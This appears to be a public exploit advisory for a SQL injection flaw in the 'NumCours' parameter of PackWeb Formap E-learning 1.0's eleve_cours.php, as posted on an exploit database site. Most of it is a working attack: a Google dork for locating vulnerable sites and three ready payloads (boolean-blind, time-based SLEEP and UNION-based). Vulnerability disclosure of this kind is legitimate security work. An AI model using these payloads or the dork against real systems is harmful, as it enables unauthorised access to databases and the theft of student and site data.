PackWeb Formap E-learning 1.0 SQL Injection

2020.02.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection # Google Dork: intitle: "PackWeb Formap E-learning" # Date: 2020-02-07 # Exploit Author: Amel BOUZIANE-LEBLOND # Vendor Homepage: https://www.ediser.com/ # Software Link: https://www.ediser.com/98517-formation-en-ligne # Version: v1.0 # Tested on: Linux # CVE : N/A # Description: # The PackWeb Formap E-learning application from EDISER is vulnerable to # SQL injection via the 'NumCours' parameter on the eleve_cours.php ==================== 1. SQLi ==================== http://localhost/eleve_cours.php?NumCours=[SQLI] The 'NumCours' parameter is vulnerable to SQL injection. GET parameter 'NumCours' is vulnerable. --- Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: http://localhost/eleve_cours.php?NumCours=-9758' OR 6342=6342-- rSaq&static=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SLEEP) Payload: http://localhost/eleve_cours.php?NumCours=' AND SLEEP(5)-- rGcs&static=1 Type: UNION query Title: MySQL UNION query (47) - 1 column Payload: http://localhost/eleve_cours.php?NumCours=' UNION ALL SELECT CONCAT(0x7176707171,0x58794e58714e52434d7879444262574a506d6f41526e636444674d5a6863667a6943517841654d54,0x717a7a6a71)#&static=1 --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top